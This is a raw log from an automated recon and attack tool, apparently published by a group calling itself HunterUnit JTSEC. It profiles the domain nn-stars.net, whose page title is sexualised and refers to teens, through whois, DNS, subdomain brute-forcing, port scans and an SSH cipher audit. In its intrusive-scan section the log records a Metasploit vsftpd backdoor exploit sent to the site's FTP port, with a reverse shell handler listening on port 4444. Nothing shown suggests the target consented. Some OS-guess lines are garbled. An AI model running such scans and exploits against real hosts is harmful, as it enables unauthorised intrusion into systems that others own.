HunterUnit JTSEC full recon #6

1. #######################################################################################################################################
2. Hostname nn-stars.net ISP Quasi Networks LTD. (AS29073)
3. Continent Africa Flag
4. SC
5. Country Seychelles Country Code SC (SYC)
6. Region Unknown Local time 27 Oct 2017 10:06 +04
7. City Unknown Latitude -4.583
8. IP Address 93.174.91.164 Longitude 55.667
9. #######################################################################################################################################
10. [i] Scanning Site: http://nn-stars.net
11.  
12. B A S I C I N F O
13. ====================
14.  
15.  
16. [+] Site Title: sexy teenspictures, teen angie
17. [+] IP address: 93.174.91.164
18. [+] Web Server: nginx
19. [+] CMS: Could Not Detect
20. [+] Cloudflare: Not Detected
21. [+] Robots File: Could NOT Find robots.txt!
22.  
23. W H O I S L O O K U P
24. ========================
25.  
26. Domain Name: NN-STARS.NET
27. Registry Domain ID: 1777282513_DOMAIN_NET-VRSN
28. Registrar WHOIS Server: whois.registrationtek.com
29. Registrar URL: http://www.RegistrationTek.com
30. Updated Date: 2017-04-19T11:16:35Z
31. Creation Date: 2013-01-30T14:29:12Z
32. Registry Expiry Date: 2018-01-30T14:29:12Z
33. Registrar: Registration Technologies, Inc.
34. Registrar IANA ID: 321
35. Registrar Abuse Contact Email:
36. Registrar Abuse Contact Phone:
37. Domain Status: ok https://icann.org/epp#ok
38. Name Server: DNS1.REGISTRATIONTEK.COM
39. Name Server: DNS2.REGISTRATIONTEK.COM
40. Name Server: DNS3.REGISTRATIONTEK.COM
41. Name Server: DNS4.REGISTRATIONTEK.COM
42. DNSSEC: unsigned
43. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
44. >>> Last update of whois database: 2017-10-27T06:08:01Z <<<
45.  
46. For more information on Whois status codes, please visit https://icann.org/epp
47.  
48.  
49.  
50. The Registry database contains ONLY .COM, .NET, .EDU domains and
51. Registrars.
52.  
53.  
54. G E O I P L O O K U P
55. =========================
56.  
57. [i] IP Address: 93.174.91.164
58. [i] Country: SC
59. [i] State: N/A
60. [i] City: N/A
61. [i] Latitude: -4.583300
62. [i] Longitude: 55.666698
63.  
64.  
65.  
66.  
67. H T T P H E A D E R S
68. =======================
69.  
70.  
71. [i] HTTP/1.1 200 OK
72. [i] Server: nginx
73. [i] Date: Fri, 27 Oct 2017 06:12:10 GMT
74. [i] Content-Type: text/html
75. [i] Connection: close
76. [i] Vary: Accept-Encoding
77. [i] X-Powered-By: PHP/5.4.45-0+deb7u8
78. [i] Set-Cookie: from=spiders; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
79. [i] Set-Cookie: lfrom=spiders; expires=Fri, 03-Nov-2017 06:12:10 GMT; path=/
80. [i] Set-Cookie: idcheck=1509084730; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
81. [i] Set-Cookie: vs=spiders%7C; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
82. [i] Set-Cookie: index_page=1; expires=Sat, 28-Oct-2017 06:12:10 GMT; path=/
83. [i] Vary: Accept-Encoding
84.  
85.  
86.  
87.  
88. D N S L O O K U P
89. ===================
90.  
91. nn-stars.net. 586 IN A 93.174.91.164
92. nn-stars.net. 7199 IN NS dns1.registrationtek.com.
93. nn-stars.net. 7199 IN NS dns2.registrationtek.com.
94. nn-stars.net. 7199 IN NS dns3.registrationtek.com.
95. nn-stars.net. 7199 IN NS dns4.registrationtek.com.
96. nn-stars.net. 7199 IN SOA dns1.registrationtek.com. support.registrationtek.com. 1492539453 3600 600 1209600 3600
97. nn-stars.net. 7199 IN TXT "Free DNS from Registration Technologies, Inc., an ICANN accredited registrar!"
98. nn-stars.net. 7199 IN TXT "Web: www.RegistrationTek.com"
99. nn-stars.net. 7199 IN TXT "Email: support@RegistrationTek.com"
100.  
101.  
102.  
103.  
104. S U B N E T C A L C U L A T I O N
105. ====================================
106.  
107. Address = 93.174.91.164
108. Network = 93.174.91.164 / 32
109. Netmask = 255.255.255.255
110. Broadcast = not needed on Point-to-Point links
111. Wildcard Mask = 0.0.0.0
112. Hosts Bits = 0
113. Max. Hosts = 1 (2^0 - 0)
114. Host Range = { 93.174.91.164 - 93.174.91.164 }
115.  
116.  
117.  
118. N M A P P O R T S C A N
119. ============================
120.  
121.  
122. Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-27 06:08 UTC
123. Nmap scan report for nn-stars.net (93.174.91.164)
124. Host is up (0.089s latency).
125. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
126. PORT STATE SERVICE VERSION
127. 21/tcp open ftp vsftpd 3.0.2
128. 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
129. 23/tcp closed telnet
130. 25/tcp closed smtp
131. 80/tcp open http nginx
132. 110/tcp closed pop3
133. 143/tcp closed imap
134. 443/tcp closed https
135. 445/tcp closed microsoft-ds
136. 3389/tcp closed ms-wbt-server
137. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
138.  
139. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
140. Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
141.  
142.  
143.  
144. S U B - D O M A I N F I N D E R
145. ==================================
146.  
147.  
148. [i] Total Subdomains Found : 1
149.  
150. [+] Subdomain: nn-stars.net
151. [-] IP: 93.174.91.164
152.  
153. [*] Performing TLD Brute force Enumeration against nn-stars.net
154. [*] The operation could take up to: 00:01:07
155. [*] A nn-stars.biz.af 5.45.75.45
156. [*] A nn-stars.co.asia 91.195.240.135
157. [*] CNAME nn-stars.biz.at free.biz.at
158. [*] A free.biz.at 216.92.134.29
159. [*] A nn-stars.com.ax 185.55.85.123
160. [*] A nn-stars.org.aw 142.4.20.12
161. [*] A nn-stars.org.ax 185.55.85.123
162. [*] A nn-stars.com.ba 195.222.33.180
163. [*] A nn-stars.co.ba 176.9.45.78
164. [*] A nn-stars.com.be 95.173.170.166
165. [*] A nn-stars.biz.by 71.18.52.2
166. [*] A nn-stars.biz.bz 199.59.242.150
167. [*] A nn-stars.net.cc 54.252.89.206
168. [*] A nn-stars.com.cc 54.252.107.64
169. [*] A nn-stars.co.cc 175.126.123.219
170. [*] A nn-stars.org.ch 72.52.4.122
171. [*] A nn-stars.co.cm 85.25.140.105
172. [*] A nn-stars.biz.cl 185.53.178.8
173. [*] A nn-stars.net.cm 85.25.140.105
174. [*] A nn-stars.com.com 52.33.196.199
175. [*] A nn-stars.co.com 173.192.115.17
176. [*] A nn-stars.net.com 199.59.242.150
177. [*] A nn-stars.com 195.56.193.78
178. [*] A nn-stars.org.com 23.23.86.44
179. [*] CNAME nn-stars.biz.cm i.cns.cm
180. [*] A i.cns.cm 118.184.56.30
181. [*] A nn-stars.biz.cr 72.52.4.122
182. [*] A nn-stars.biz.cx 72.52.4.122
183. [*] A nn-stars.com.cz 62.109.128.30
184. [*] A nn-stars.net.cz 80.250.24.177
185. [*] A nn-stars.biz.cz 185.53.179.7
186. [*] A nn-stars.com.de 50.56.68.37
187. [*] CNAME nn-stars.co.de co.de
188. [*] A co.de 144.76.162.245
189. [*] CNAME nn-stars.org.de www.org.de
190. [*] A www.org.de 78.47.128.8
191. [*] A nn-stars.net.eu 78.46.90.98
192. [*] A nn-stars.org.eu 78.46.90.98
193. [*] A nn-stars.biz.fi 185.55.85.123
194. [*] A nn-stars.fm 173.230.131.38
195. [*] A nn-stars.biz.fm 173.230.131.38
196. [*] A nn-stars.org.fr 149.202.133.35
197. [*] A nn-stars.biz.gl 72.52.4.122
198. [*] CNAME nn-stars.co.gp co.gp
199. [*] A co.gp 144.76.162.245
200. [*] A nn-stars.co.hn 208.100.40.203
201. [*] CNAME nn-stars.net.hr net.hr
202. [*] A net.hr 192.0.78.25
203. [*] A net.hr 192.0.78.24
204. [*] A nn-stars.co.ht 72.52.4.122
205. [*] CNAME nn-stars.biz.hn parkmydomain.vhostgo.com
206. [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
207. [*] A westuser.dopa.com 107.186.245.119
208. [*] A nn-stars.co.jobs 50.17.193.222
209. [*] A nn-stars.com.jobs 50.19.241.165
210. [*] A nn-stars.net.jobs 50.19.241.165
211. [*] A nn-stars.biz.jobs 50.19.241.165
212. [*] A nn-stars.org.jobs 50.19.241.165
213. [*] A nn-stars.la 173.230.141.80
214. [*] A nn-stars.co.la 195.110.124.154
215. [*] CNAME nn-stars.biz.li 712936.parkingcrew.net
216. [*] A 712936.parkingcrew.net 185.53.179.29
217. [*] A nn-stars.biz.lu 195.26.5.2
218. [*] A nn-stars.biz.ly 64.136.20.39
219. [*] A nn-stars.biz.md 72.52.4.122
220. [*] A nn-stars.co.mk 87.76.31.211
221. [*] A nn-stars.co.mobi 54.225.105.179
222. [*] A nn-stars.biz.my 202.190.174.44
223. [*] A nn-stars.net 93.174.91.164
224. [*] A nn-stars.co.net 188.166.216.219
225. [*] A nn-stars.net.net 52.50.81.210
226. [*] A nn-stars.org.net 23.23.86.44
227. [*] A nn-stars.co.nl 37.97.184.204
228. [*] A nn-stars.com.nl 83.98.157.102
229. [*] A nn-stars.net.nl 83.98.157.102
230. [*] A nn-stars.co.nr 208.100.40.202
231. [*] A nn-stars.net.nu 199.102.76.78
232. [*] CNAME nn-stars.co.nu co.nu
233. [*] A co.nu 144.76.162.245
234. [*] CNAME nn-stars.com.nu com.nu
235. [*] A com.nu 144.76.162.245
236. [*] A nn-stars.org.nu 80.92.84.139
237. [*] A nn-stars.com.org 23.23.86.44
238. [*] CNAME nn-stars.net.org pewtrusts.org
239. [*] A pewtrusts.org 204.74.99.100
240. [*] A nn-stars.ph 45.79.222.138
241. [*] A nn-stars.co.ph 45.79.222.138
242. [*] A nn-stars.com.ph 45.79.222.138
243. [*] A nn-stars.net.ph 45.79.222.138
244. [*] A nn-stars.org.ph 45.79.222.138
245. [*] A nn-stars.co.pl 212.91.6.55
246. [*] A nn-stars.org.pm 208.73.211.177
247. [*] A nn-stars.org.pm 208.73.210.202
248. [*] A nn-stars.org.pm 208.73.211.165
249. [*] A nn-stars.org.pm 208.73.210.217
250. [*] CNAME nn-stars.biz.ps biz.ps
251. [*] A biz.ps 144.76.162.245
252. [*] A nn-stars.co.pt 194.107.127.52
253. [*] A nn-stars.pw 141.8.226.58
254. [*] A nn-stars.co.pw 141.8.226.59
255. [*] A nn-stars.co.ps 66.96.132.56
256. [*] A nn-stars.net.pw 141.8.226.59
257. [*] A nn-stars.biz.pw 141.8.226.59
258. [*] A nn-stars.org.pw 141.8.226.59
259. [*] A nn-stars.net.ro 69.64.52.127
260. [*] A nn-stars.org.re 217.70.184.38
261. [*] CNAME nn-stars.co.ro now.co.ro
262. [*] A now.co.ro 185.27.255.9
263. [*] A nn-stars.com.ru 178.210.89.119
264. [*] A nn-stars.biz.sb 72.52.4.122
265. [*] A nn-stars.biz.se 185.53.179.6
266. [*] CNAME nn-stars.net.se 773147.parkingcrew.net
267. [*] A 773147.parkingcrew.net 185.53.179.29
268. [*] A nn-stars.co.sl 91.195.240.135
269. [*] A nn-stars.com.sr 143.95.106.249
270. [*] A nn-stars.co.su 72.52.4.122
271. [*] A nn-stars.biz.st 91.121.28.115
272. [*] A nn-stars.biz.tc 64.136.20.39
273. [*] A nn-stars.biz.tf 85.236.153.18
274. [*] A nn-stars.net.tf 188.40.70.29
275. [*] A nn-stars.net.tf 188.40.117.12
276. [*] A nn-stars.net.tf 188.40.70.27
277. [*] A nn-stars.co.tl 208.100.40.202
278. [*] A nn-stars.co.to 175.118.124.44
279. [*] A nn-stars.co.tv 31.186.25.163
280. [*] A nn-stars.biz.tv 72.52.4.122
281. [*] A nn-stars.org.tv 72.52.4.122
282. [*] CNAME nn-stars.biz.uz biz.uz
283. [*] A biz.uz 144.76.162.245
284. [*] A nn-stars.vg 88.198.29.97
285. [*] A nn-stars.co.vg 88.198.29.97
286. [*] A nn-stars.com.vg 88.198.29.97
287. [*] A nn-stars.net.vg 166.62.28.147
288. [*] A nn-stars.biz.vg 89.31.143.20
289. [*] A nn-stars.com.ws 202.4.48.211
290. [*] A nn-stars.net.ws 202.4.48.211
291. [*] A nn-stars.org.ws 202.4.48.211
292. [*] A nn-stars.ws 64.70.19.203
293. [*] A nn-stars.biz.ws 184.168.221.104
294. inetnum: 93.174.91.0 - 93.174.91.255
295. netname: SC-QUASI52
296. descr: QUASI
297. country: SC
298. org: ORG-QNL3-RIPE
299. admin-c: QNL1-RIPE
300. tech-c: QNL1-RIPE
301. status: ASSIGNED PA
302. mnt-by: QUASINETWORKS-MNT
303. mnt-lower: QUASINETWORKS-MNT
304. mnt-routes: QUASINETWORKS-MNT
305. created: 2016-01-23T22:20:58Z
306. last-modified: 2016-01-23T22:20:58Z
307. source: RIPE
308.  
309. organisation: ORG-QNL3-RIPE
310. org-name: Quasi Networks LTD.
311. org-type: OTHER
312. address: Suite 1, Second Floor
313. address: Sound & Vision House, Francis Rachel Street
314. address: Victoria, Mahe, SEYCHELLES
315. remarks: *****************************************************************************
316. remarks: IMPORTANT INFORMATION
317. remarks: *****************************************************************************
318. remarks: We are a high bandwidth network provider offering bandwidth solutions.
319. remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
320. remarks: Please only use abuse@quasinetworks.com for abuse reports.
321. remarks: For all other requests, please see the details on our website.
322. remarks: *****************************************************************************
323. abuse-mailbox: abuse@quasinetworks.com
324. abuse-c: AR34302-RIPE
325. mnt-ref: QUASINETWORKS-MNT
326. mnt-by: QUASINETWORKS-MNT
327. created: 2015-11-08T22:25:26Z
328. last-modified: 2015-11-27T09:37:50Z
329. source: RIPE # Filtered
330.  
331. role: Quasi Networks LTD
332. address: Suite 1, Second Floor
333. address: Sound & Vision House, Francis Rachel Street
334. address: Victoria, Mahe, SEYCHELLES
335. remarks: *****************************************************************************
336. remarks: IMPORTANT INFORMATION
337. remarks: *****************************************************************************
338. remarks: We are a high bandwidth network provider offering bandwidth solutions.
339. remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
340. remarks: Please only use abuse@quasinetworks.com for abuse reports.
341. remarks: For all other requests, please see the details on our website.
342. remarks: *****************************************************************************
343. abuse-mailbox: abuse@quasinetworks.com
344. nic-hdl: QNL1-RIPE
345. mnt-by: QUASINETWORKS-MNT
346. created: 2015-11-07T22:43:04Z
347. last-modified: 2015-11-07T23:04:49Z
348. source: RIPE # Filtered
349.  
350. % Information related to '93.174.88.0/21as29073'
351.  
352. route: 93.174.88.0/21
353. descr: Quasi Networks LTD (IBC)
354. origin: as29073
355. mnt-by: QUASINETWORKS-MNT
356. created: 2008-06-20T15:33:47Z
357. last-modified: 2016-01-23T22:26:12Z
358. source: RIPE
359.  
360. % This query was served by the RIPE Database Query Service version 1.90 (ANGUS)
361. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
362. Server: 192.168.1.254
363. Address: 192.168.1.254#53
364.  
365. Non-authoritative answer:
366. Name: nn-stars.net
367. Address: 93.174.91.164
368.  
369. nn-stars.net has address 93.174.91.164
370.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
371.  
372. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
373.  
374. [+] Target is nn-stars.net
375. [+] Loading modules.
376. [+] Following modules are loaded:
377. [x] [1] ping:icmp_ping - ICMP echo discovery module
378. [x] [2] ping:tcp_ping - TCP-based ping discovery module
379. [x] [3] ping:udp_ping - UDP-based ping discovery module
380. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
381. [x] [5] infogather:portscan - TCP and UDP PortScanner
382. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
383. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
384. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
385. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
386. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
387. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
388. [x] [12] fingerprint:smb - SMB fingerprinting module
389. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
390. [+] 13 modules registered
391. [+] Initializing scan engine
392. [+] Running scan engine
393. [-] ping:tcp_ping module: no closed/open TCP ports known on 93.174.91.164. Module test failed
394. [-] ping:udp_ping module: no closed/open UDP ports known on 93.174.91.164. Module test failed
395. [-] No distance calculation. 93.174.91.164 appears to be dead or no ports known
396. [+] Host: 93.174.91.164 is up (Guess probability: 50%)
397. [+] Target: 93.174.91.164 is alive. Round-Trip Time: 0.49963 sec
398. [+] Selected safe Round-Trip Time value is: 0.99927 sec
399. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
400. [-] fingerprint:smb need either TCP port 139 or 445 to run
401. [+] Primary guess:
402. [+] Host 93.174.91.164 Running OS: (Guess probability: 100%)
403. [+] Other guesses:
404. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
405. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
406. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
407. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
408. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
409. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
410. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
411. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
412. [+] Host 93.174.91.164 Running OS: Àà&sU (Guess probability: 95%)
413. [+] Cleaning up scan engine
414. [+] Modules deinitialized
415. [+] Execution completed.
416.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
417. Domain Name: NN-STARS.NET
418. Registry Domain ID: 1777282513_DOMAIN_NET-VRSN
419. Registrar WHOIS Server: whois.registrationtek.com
420. Registrar URL: http://www.RegistrationTek.com
421. Updated Date: 2017-04-19T11:16:35Z
422. Creation Date: 2013-01-30T14:29:12Z
423. Registry Expiry Date: 2018-01-30T14:29:12Z
424. Registrar: Registration Technologies, Inc.
425. Registrar IANA ID: 321
426. Registrar Abuse Contact Email:
427. Registrar Abuse Contact Phone:
428. Domain Status: ok https://icann.org/epp#ok
429. Name Server: DNS1.REGISTRATIONTEK.COM
430. Name Server: DNS2.REGISTRATIONTEK.COM
431. Name Server: DNS3.REGISTRATIONTEK.COM
432. Name Server: DNS4.REGISTRATIONTEK.COM
433. DNSSEC: unsigned
434. Domain Name: nn-stars.net
435. Registry Domain ID: 1777282513_DOMAIN_NET-VRSN
436. Registrar WHOIS Server: whois.registrationtek.com
437. Registrar URL: https://www.registrationtek.com/whois-i/regtek_whois.php
438. Updated Date: 2017-04-19T11:16:35Z
439. Creation Date: 2013-01-30T14:29:12Z
440. Registrar Registration Expiration Date: 2018-01-30T14:29:12Z
441. Registrar: Registration Technologies, Inc.
442. Registrar IANA ID: 321
443. Registrar Abuse Contact Email: illegal@registrationtek.com
444. Registrar Abuse Contact Phone: +1.4016482137
445. Domain Status: OK https://icann.org/epp#OK
446. Registry Registrant ID:
447. Registrant Name:
448. Registrant Organization: Registration Technologies, Inc.
449. Registrant Street: PMB: 43423, 400 Putnam Pike, STE D203
450. Registrant City: Smithfield
451. Registrant State/Province: RI
452. Registrant Postal Code: 02917-2442
453. Registrant Country: US
454. Registrant Phone: +1.4016480147
455. Registrant Phone Ext:
456. Registrant Fax:
457. Registrant Fax Ext:
458. Registrant Email: NOSPAM-43423@RTWhoisEnvoy.net
459. Registry Admin ID:
460. Admin Name:
461. Admin Organization: Registration Technologies, Inc.
462. Admin Street: PMB: 43423, 400 Putnam Pike, STE D203
463. Admin City: Smithfield
464. Admin State/Province: RI
465. Admin Postal Code: 02917-2442
466. Admin Country: US
467. Admin Phone: +1.4016480147
468. Admin Phone Ext:
469. Admin Fax:
470. Admin Fax Ext:
471. Admin Email: NOSPAM-43423@RTWhoisEnvoy.net
472. Registry Tech ID:
473. Tech Name:
474. Tech Organization: Registration Technologies, Inc.
475. Tech Street: PMB: 43423, 400 Putnam Pike, STE D203
476. Tech City: Smithfield
477. Tech State/Province: RI
478. Tech Postal Code: 02917-2442
479. Tech Country: US
480. Tech Phone: +1.4016480147
481. Tech Phone Ext:
482. Tech Fax:
483. Tech Fax Ext:
484. Tech Email: NOSPAM-43423@RTWhoisEnvoy.net
485. Name Server: DNS1.REGISTRATIONTEK.COM
486. Name Server: DNS2.REGISTRATIONTEK.COM
487. Name Server: DNS3.REGISTRATIONTEK.COM
488. Name Server: DNS4.REGISTRATIONTEK.COM
489. DNSSEC: unsigned
490.  
491. [+] Hosts found in search engines:
492. ------------------------------------
493. [-] Resolving hostnames IPs...
494. 93.174.91.164:Img.nn-stars.net
495. 93.174.91.164:img.nn-stars.net
496. 93.174.91.164:www.nn-stars.net
497.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
498.  
499. ; <<>> DiG 9.10.3-P4-Debian <<>> -x nn-stars.net
500. ;; global options: +cmd
501. ;; Got answer:
502. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14625
503. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
504.  
505. ;; OPT PSEUDOSECTION:
506. ; EDNS: version: 0, flags:; udp: 4096
507. ;; QUESTION SECTION:
508. ;net.nn-stars.in-addr.arpa. IN PTR
509.  
510. ;; AUTHORITY SECTION:
511. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102402 1800 900 604800 3600
512.  
513. ;; Query time: 37 msec
514. ;; SERVER: 192.168.1.254#53(192.168.1.254)
515. ;; WHEN: Fri Oct 27 02:08:11 EDT 2017
516. ;; MSG SIZE rcvd: 122
517.  
518. dnsenum VERSION:1.2.4
519. 
520. ----- nn-stars.net -----
521. 
522.  
523. Host's addresses:
524. __________________
525.  
526. nn-stars.net. 432 IN A 93.174.91.164
527. 
528.  
529. Name Servers:
530. ______________
531.  
532. dns4.registrationtek.com. 7200 IN A 193.70.95.140
533. dns1.registrationtek.com. 7200 IN A 72.46.65.111
534. dns3.registrationtek.com. 7031 IN A 185.122.59.99
535. dns2.registrationtek.com. 7200 IN A 107.150.4.135
536. 
537.  
538. Mail (MX) Servers:
539. ___________________
540.  
541. 
542.  
543. Trying Zone Transfers and getting Bind Versions:
544. _________________________________________________
545.  
546. 
547. Trying Zone Transfer for nn-stars.net on dns4.registrationtek.com ...
548.  
549. Trying Zone Transfer for nn-stars.net on dns1.registrationtek.com ...
550.  
551. Trying Zone Transfer for nn-stars.net on dns3.registrationtek.com ...
552.  
553. Trying Zone Transfer for nn-stars.net on dns2.registrationtek.com ...
554.  
555. brute force file not specified, bay.
556.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
557. 
558. ____ _ _ _ _ _____
559. / ___| _ _| |__ | (_)___| |_|___ / _ __
560. \___ \| | | | '_ \| | / __| __| |_ \| '__|
561. ___) | |_| | |_) | | \__ \ |_ ___) | |
562. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
563.  
564. # Coded By Ahmed Aboul-Ela - @aboul3la
565.  
566. [-] Enumerating subdomains now for nn-stars.net
567. [-] verbosity is enabled, will show the subdomains results in realtime
568. [-] Searching now in Baidu..
569. [-] Searching now in Yahoo..
570. [-] Searching now in Google..
571. [-] Searching now in Bing..
572. [-] Searching now in Ask..
573. [-] Searching now in Netcraft..
574. [-] Searching now in DNSdumpster..
575. [-] Searching now in Virustotal..
576. [-] Searching now in ThreatCrowd..
577. [-] Searching now in SSL Certificates..
578. [-] Searching now in PassiveDNS..
579. Virustotal: www.nn-stars.net
580. Virustotal: img.nn-stars.net
581. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-nn-stars.net.txt
582. [-] Total Unique Subdomains Found: 2
583. www.nn-stars.net
584. img.nn-stars.net
585.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
586.  ║ ╠╩╝ ║ ╚═╗╠═╣
587.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
588.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
589. 
590.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-nn-stars.net-full.txt
591. 
592.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
593.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
594.  
595.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
596. PING nn-stars.net (93.174.91.164) 56(84) bytes of data.
597. 64 bytes from no-reverse-dns-configured.com (93.174.91.164): icmp_seq=1 ttl=58 time=115 ms
598.  
599. --- nn-stars.net ping statistics ---
600. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
601. rtt min/avg/max/mdev = 115.888/115.888/115.888/0.000 ms
602.  
603.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
604.  
605. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:08 EDT
606. Nmap scan report for nn-stars.net (93.174.91.164)
607. Host is up (0.17s latency).
608. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
609. Not shown: 40 closed ports, 4 filtered ports
610. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
611. PORT STATE SERVICE
612. 21/tcp open ftp
613. 22/tcp open ssh
614. 53/tcp open domain
615. 80/tcp open http
616. 111/tcp open rpcbind
617.  
618. Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
619.  
620.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
621.  + -- --=[Port 21 opened... running tests...
622.  
623. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:08 EDT
624. Nmap scan report for nn-stars.net (93.174.91.164)
625. Host is up (0.021s latency).
626. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
627.  
628. PORT STATE SERVICE VERSION
629. 21/tcp filtered ftp
630. Too many fingerprints match this host to give specific OS details
631. Network Distance: 7 hops
632.  
633. TRACEROUTE (using proto 1/icmp)
634. HOP RTT ADDRESS
635. 1 109.38 ms 10.13.0.1
636. 2 ...
637. 3 109.42 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
638. 4 185.72 ms 10.95.33.10
639. 5 115.83 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
640. 6 ...
641. 7 115.65 ms no-reverse-dns-configured.com (93.174.91.164)
642.  
643. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
644. Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
645.  
646. =[ metasploit v4.16.12-dev ]
647. + -- --=[ 1693 exploits - 968 auxiliary - 299 post ]
648. + -- --=[ 499 payloads - 40 encoders - 10 nops ]
649. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
650.  
651. RHOST => nn-stars.net
652. RHOSTS => nn-stars.net
653. [*] nn-stars.net:21 - Banner: 220 (vsFTPd 3.0.2)
654. [*] nn-stars.net:21 - USER: 331 Please specify the password.
655. [*] Exploit completed, but no session was created.
656. [*] Started reverse TCP double handler on 10.13.4.10:4444
657. [*] nn-stars.net:21 - Sending Backdoor Command
658. [*] Exploit completed, but no session was created.
659.  + -- --=[Port 22 opened... running tests...
660. # general
661. (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
662. (gen) software: OpenSSH 6.0p1
663. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
664. (gen) compression: enabled (zlib@openssh.com)
665.  
666. # key exchange algorithms
667. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
668. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
669. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
670. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
671. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
672. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
673. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
674. `- [info] available since OpenSSH 4.4
675. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
676. `- [warn] using weak hashing algorithm
677. `- [info] available since OpenSSH 2.3.0
678. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
679. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
680. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
681. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
682. `- [warn] using small 1024-bit modulus
683. `- [warn] using weak hashing algorithm
684. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
685.  
686. # host-key algorithms
687. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
688. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
689. `- [warn] using small 1024-bit modulus
690. `- [warn] using weak random number generator could reveal the key
691. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
692. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
693. `- [warn] using weak random number generator could reveal the key
694. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
695.  
696. # encryption algorithms (ciphers)
697. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
698. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
699. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
700. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
701. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
702. `- [warn] using weak cipher
703. `- [info] available since OpenSSH 4.2
